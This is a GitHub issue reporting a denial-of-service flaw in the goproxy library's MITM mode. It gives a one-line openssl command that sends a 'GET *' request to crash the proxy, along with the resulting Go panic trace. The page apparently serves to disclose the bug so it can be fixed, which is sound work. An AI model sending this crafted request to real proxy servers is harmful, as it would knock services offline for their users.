goproxy v1.1 was discovered to contain an issue which can lead to Denial of Service (DoS) via unspecified vectors

A HTTP request to HTTPS page replaced path the "/" with asterix "*" crashes the elazar/goproxy server in MITM mode.

Vulnerability can be triggered by running this command against elazarl/goproxy in MITM Mode.

```
echo -e "GET * HTTP/1.1\r\n" | openssl s_client -proxy localhost:8000 -connect "localhost:8000" -ign_eof
```

Similar to [this](https://github.com/elazarl/goproxy/issues/461)

```
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x6b3260]

goroutine 1287 [running]:
github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps.func2()
        /go/pkg/mod/github.com/elazarl/goproxy@v0.0.0-20221015165544-a0805db90819/https.go:249 +0xd60
created by github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps
        /go/pkg/mod/github.com/elazarl/goproxy@v0.0.0-20221015165544-a0805db90819/https.go:211 +0x611
```

https://github.com/elazarl/goproxy/blob/master/https.go#L249

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

goproxy v1.1 was discovered to contain an issue which can lead to Denial of Service (DoS) via unspecified vectors #502

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

goproxy v1.1 was discovered to contain an issue which can lead to Denial of Service (DoS) via unspecified vectors #502

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions